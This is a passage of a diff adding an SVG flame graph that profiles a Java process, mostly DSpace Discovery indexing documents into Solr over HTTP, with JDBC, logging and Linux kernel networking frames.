+<title>org/dspace/content/Item:::getCommunities (2 samples, 0.96%)</title><rect x="715.7" y="405" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="415.5" ></text>
+</g>
+<g >
+<title>call_stub (134 samples, 64.11%)</title><rect x="410.9" y="501" width="756.5" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="413.86" y="511.5" >call_stub</text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.48%)</title><rect x="631.1" y="293" width="5.6" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="634.05" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (9 samples, 4.31%)</title><rect x="727.0" y="389" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="730.03" y="399.5" >org/a..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.48%)</title><rect x="1116.6" y="325" width="5.6" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1119.60" y="335.5" ></text>
+</g>
+<g >
+<title>ip_finish_output (8 samples, 3.83%)</title><rect x="343.1" y="485" width="45.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="346.11" y="495.5" >ip_f..</text>
+</g>
+<g >
+<title>__x64_sys_poll (2 samples, 0.96%)</title><rect x="1144.8" y="213" width="11.3" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1147.83" y="223.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.48%)</title><rect x="772.2" y="229" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="775.20" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.48%)</title><rect x="935.9" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="938.93" y="271.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.48%)</title><rect x="930.3" y="181" width="5.6" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="933.29" y="191.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.48%)</title><rect x="772.2" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="335.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (2 samples, 0.96%)</title><rect x="969.8" y="389" width="11.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="972.81" y="399.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.48%)</title><rect x="687.5" y="357" width="5.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="690.51" y="367.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (1 samples, 0.48%)</title><rect x="1071.4" y="261" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1074.44" y="271.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range (2 samples, 0.96%)</title><rect x="1144.8" y="165" width="11.3" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1147.83" y="175.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Collection:::&lt;init&gt; (2 samples, 0.96%)</title><rect x="698.8" y="389" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="701.80" y="399.5" ></text>
+</g>
+<g >
+<title>call_stub (2 samples, 0.96%)</title><rect x="518.1" y="261" width="11.3" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="521.13" y="271.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::split (1 samples, 0.48%)</title><rect x="433.4" y="421" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="436.44" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/Formatter:::format (5 samples, 2.39%)</title><rect x="580.2" y="293" width="28.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="583.24" y="303.5" >j..</text>
+</g>
+<g >
+<title>java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.48%)</title><rect x="1139.2" y="293" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1142.19" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.48%)</title><rect x="992.4" y="229" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="239.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.48%)</title><rect x="631.1" y="325" width="5.6" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="634.05" y="335.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.96%)</title><rect x="653.6" y="277" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="687.5" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="690.51" y="383.5" ></text>
+</g>
+<g >
+<title>inet_send_prepare (1 samples, 0.48%)</title><rect x="393.9" y="661" width="5.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="396.92" y="671.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.48%)</title><rect x="715.7" y="213" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="718.74" y="223.5" ></text>
+</g>
+<g >
+<title>__alloc_skb (1 samples, 0.48%)</title><rect x="309.2" y="597" width="5.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="312.23" y="607.5" ></text>
+</g>
+<g >
+<title>pollwake (1 samples, 0.48%)</title><rect x="371.3" y="117" width="5.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="374.34" y="127.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.48%)</title><rect x="1127.9" y="197" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseHeader (1 samples, 0.48%)</title><rect x="1127.9" y="277" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="287.5" ></text>
+</g>
+<g >
+<title>__sys_recvfrom (20 samples, 9.57%)</title><rect x="162.4" y="693" width="113.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="165.44" y="703.5" >__sys_recvfrom</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getName (7 samples, 3.35%)</title><rect x="873.8" y="341" width="39.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="876.83" y="351.5" >org..</text>
+</g>
+<g >
+<title>java/util/Arrays:::sort (1 samples, 0.48%)</title><rect x="981.1" y="373" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="984.10" y="383.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (14 samples, 6.70%)</title><rect x="314.9" y="565" width="79.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="317.88" y="575.5" >__tcp_tra..</text>
+</g>
+<g >
+<title>x86_pmu_enable (24 samples, 11.48%)</title><rect x="26.9" y="549" width="135.5" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="29.94" y="559.5" >x86_pmu_enable</text>
+</g>
+<g >
+<title>do_syscall_64 (20 samples, 9.57%)</title><rect x="162.4" y="725" width="113.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="165.44" y="735.5" >do_syscall_64</text>
+</g>
+<g >
+<title>org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.48%)</title><rect x="535.1" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="538.07" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::writeDocument (41 samples, 19.62%)</title><rect x="727.0" y="405" width="231.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="730.03" y="415.5" >org/dspace/discovery/SolrServi..</text>
+</g>
+<g >
+<title>org/dspace/content/Item:::decache (1 samples, 0.48%)</title><rect x="416.5" y="437" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="419.51" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (2 samples, 0.96%)</title><rect x="958.5" y="405" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="961.52" y="415.5" ></text>
+</g>
+<g >
+<title>queued_spin_lock_slowpath (1 samples, 0.48%)</title><rect x="297.9" y="613" width="5.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="300.94" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (12 samples, 5.74%)</title><rect x="789.1" y="197" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="207.5" >org/apa..</text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URIUtils:::rewriteURI (1 samples, 0.48%)</title><rect x="924.6" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="303.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (4 samples, 1.91%)</title><rect x="1082.7" y="293" width="22.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1085.73" y="303.5" >j..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="523.8" y="181" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="526.78" y="191.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="581" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="591.5" >Interpreter</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineProxy (1 samples, 0.48%)</title><rect x="1071.4" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1074.44" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.48%)</title><rect x="619.8" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="622.76" y="367.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (1 samples, 0.48%)</title><rect x="1150.5" y="117" width="5.6" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1153.48" y="127.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::toQueryString (1 samples, 0.48%)</title><rect x="913.3" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="916.35" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (2 samples, 0.96%)</title><rect x="625.4" y="373" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="628.41" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.48%)</title><rect x="715.7" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="319.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (4 samples, 1.91%)</title><rect x="557.7" y="277" width="22.5" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="560.66" y="287.5" >J..</text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="533" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="543.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>import_single_range (1 samples, 0.48%)</title><rect x="399.6" y="693" width="5.6" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="402.57" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory:::getFactory (3 samples, 1.44%)</title><rect x="518.1" y="325" width="17.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="335.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.48%)</title><rect x="715.7" y="229" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="718.74" y="239.5" ></text>
+</g>
+<g >
+<title>schedule (24 samples, 11.48%)</title><rect x="26.9" y="629" width="135.5" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="29.94" y="639.5" >schedule</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.48%)</title><rect x="992.4" y="213" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="223.5" ></text>
+</g>
+<g >
+<title>java/lang/ThreadLocal$ThreadLocalMap:::set (1 samples, 0.48%)</title><rect x="986.7" y="341" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="989.75" y="351.5" ></text>
+</g>
+<g >
+<title>poll_schedule_timeout.constprop.0 (1 samples, 0.48%)</title><rect x="930.3" y="117" width="5.6" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="933.29" y="127.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (8 samples, 3.83%)</title><rect x="1116.6" y="357" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="367.5" >org/..</text>
+</g>
+<g >
+<title>__wake_up_sync_key (1 samples, 0.48%)</title><rect x="371.3" y="165" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="374.34" y="175.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::buildDocument (108 samples, 51.67%)</title><rect x="444.7" y="421" width="609.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="447.74" y="431.5" >org/dspace/discovery/SolrServiceImpl:::buildDocument</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="229" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::writeTo (12 samples, 5.74%)</title><rect x="789.1" y="229" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="239.5" >org/apa..</text>
+</g>
+<g >
+<title>ip_local_out (13 samples, 6.22%)</title><rect x="314.9" y="517" width="73.4" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="317.88" y="527.5" >ip_local..</text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.48%)</title><rect x="1156.1" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1159.12" y="303.5" ></text>
+</g>
+<g >
+<title>schedule_timeout (17 samples, 8.13%)</title><rect x="168.1" y="597" width="96.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="171.09" y="607.5" >schedule_ti..</text>
+</g>
+<g >
+<title>do_futex (24 samples, 11.48%)</title><rect x="26.9" y="677" width="135.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="29.94" y="687.5" >do_futex</text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URIBuilder:::digestURI (1 samples, 0.48%)</title><rect x="924.6" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.48%)</title><rect x="964.2" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="967.16" y="383.5" ></text>
+</g>
+<g >
+<title>wait_woken (17 samples, 8.13%)</title><rect x="168.1" y="613" width="96.0" height="15.0" fill="rgb(219,79,79)" rx="2" ry="2" />
+<text  x="171.09" y="623.5" >wait_woken</text>
+</g>
+<g >
+<title>java/lang/Class:::getMethod0 (1 samples, 0.48%)</title><rect x="523.8" y="229" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="526.78" y="239.5" ></text>
+</g>
+<g >
+<title>org/dspace/text/filter/InitialArticleWord:::filter (1 samples, 0.48%)</title><rect x="614.1" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="617.11" y="383.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.48%)</title><rect x="715.7" y="245" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="718.74" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (9 samples, 4.31%)</title><rect x="1065.8" y="373" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1068.79" y="383.5" >org/a..</text>
+</g>
+<g >
+<title>__sys_sendto (19 samples, 9.09%)</title><rect x="292.3" y="693" width="107.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="295.30" y="703.5" >__sys_sendto</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1082.7" y="229" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1085.73" y="239.5" ></text>
+</g>
+<g >
+<title>nf_ct_seq_offset (1 samples, 0.48%)</title><rect x="326.2" y="421" width="5.6" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="329.17" y="431.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::instantiateBean (1 samples, 0.48%)</title><rect x="992.4" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="995.39" y="335.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/TypeConverterDelegate:::convertIfNecessary (16 samples, 7.66%)</title><rect x="518.1" y="373" width="90.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="383.5" >org/spring..</text>
+</g>
+<g >
+<title>inet_ehashfn (1 samples, 0.48%)</title><rect x="365.7" y="213" width="5.6" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="368.69" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="69" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="79.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.48%)</title><rect x="721.4" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="724.39" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestDefaultHeaders:::process (1 samples, 0.48%)</title><rect x="935.9" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="938.93" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.48%)</title><rect x="992.4" y="197" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="207.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::getConstructor0 (1 samples, 0.48%)</title><rect x="777.8" y="341" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="780.85" y="351.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.48%)</title><rect x="930.3" y="245" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="933.29" y="255.5" ></text>
+</g>
+<g >
+<title>__kmalloc_node_track_caller (1 samples, 0.48%)</title><rect x="309.2" y="565" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="312.23" y="575.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.48%)</title><rect x="992.4" y="245" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="255.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::resetChanged (1 samples, 0.48%)</title><rect x="676.2" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="679.22" y="351.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendQuery (1 samples, 0.48%)</title><rect x="659.3" y="261" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="662.28" y="271.5" ></text>
+</g>
+<g >
+<title>deactivate_task (1 samples, 0.48%)</title><rect x="168.1" y="549" width="5.6" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="171.09" y="559.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%)</title><rect x="715.7" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (1 samples, 0.48%)</title><rect x="772.2" y="245" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="255.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (24 samples, 11.48%)</title><rect x="26.9" y="581" width="135.5" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="29.94" y="591.5" >__perf_event_task..</text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.48%)</title><rect x="478.6" y="389" width="5.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="481.61" y="399.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (134 samples, 64.11%)</title><rect x="410.9" y="613" width="756.5" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="413.86" y="623.5" >sun/reflect/DelegatingMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService:::getMatchableConverters (1 samples, 0.48%)</title><rect x="540.7" y="325" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="543.72" y="335.5" ></text>
+</g>
+<g >
+<title>ip_output (8 samples, 3.83%)</title><rect x="343.1" y="501" width="45.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="346.11" y="511.5" >ip_o..</text>
+</g>
+<g >
+<title>__poll (1 samples, 0.48%)</title><rect x="930.3" y="197" width="5.6" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="933.29" y="207.5" ></text>
+</g>
+<g >
+<title>ip_rcv (4 samples, 1.91%)</title><rect x="365.7" y="309" width="22.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="368.69" y="319.5" >i..</text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="992.4" y="261" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="995.39" y="271.5" ></text>
+</g>
+<g >
+<title>java (209 samples, 100.00%)</title><rect x="10.0" y="773" width="1180.0" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="13.00" y="783.5" >java</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="772.2" y="165" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="775.20" y="175.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.48%)</title><rect x="512.5" y="405" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="515.49" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::determineRoute (1 samples, 0.48%)</title><rect x="1122.2" y="325" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1125.25" y="335.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.48%)</title><rect x="772.2" y="213" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="775.20" y="223.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="469" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="479.5" >Interpreter</text>
+</g>
+<g >
+<title>org/dspace/discovery/configuration/DiscoverySearchFilter:::getFilterType (1 samples, 0.48%)</title><rect x="1161.8" y="421" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1164.77" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.96%)</title><rect x="636.7" y="373" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="639.70" y="383.5" ></text>
+</g>
+<g >
+<title>__generic_file_write_iter (1 samples, 0.48%)</title><rect x="501.2" y="85" width="5.6" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="504.20" y="95.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="709" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="719.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (2 samples, 0.96%)</title><rect x="653.6" y="293" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="303.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="485" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="495.5" >Interpreter</text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (1 samples, 0.48%)</title><rect x="772.2" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="351.5" ></text>
+</g>
+<g >
+<title>JVM_InternString (1 samples, 0.48%)</title><rect x="523.8" y="197" width="5.6" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="526.78" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getTimestamp (1 samples, 0.48%)</title><rect x="427.8" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="430.80" y="367.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (1 samples, 0.48%)</title><rect x="337.5" y="453" width="5.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="340.46" y="463.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.48%)</title><rect x="930.3" y="165" width="5.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="933.29" y="175.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (5 samples, 2.39%)</title><rect x="484.3" y="341" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="351.5" >o..</text>
+</g>
+<g >
+<title>tcp_recvmsg (19 samples, 9.09%)</title><rect x="168.1" y="645" width="107.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="171.09" y="655.5" >tcp_recvmsg</text>
+</g>
+<g >
+<title>org/dspace/authorize/AuthorizeManager:::getPoliciesActionFilter (2 samples, 0.96%)</title><rect x="958.5" y="389" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="961.52" y="399.5" ></text>
+</g>
+<g >
+<title>tick_sched_handle (1 samples, 0.48%)</title><rect x="631.1" y="261" width="5.6" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="634.05" y="271.5" ></text>
+</g>
+<g >
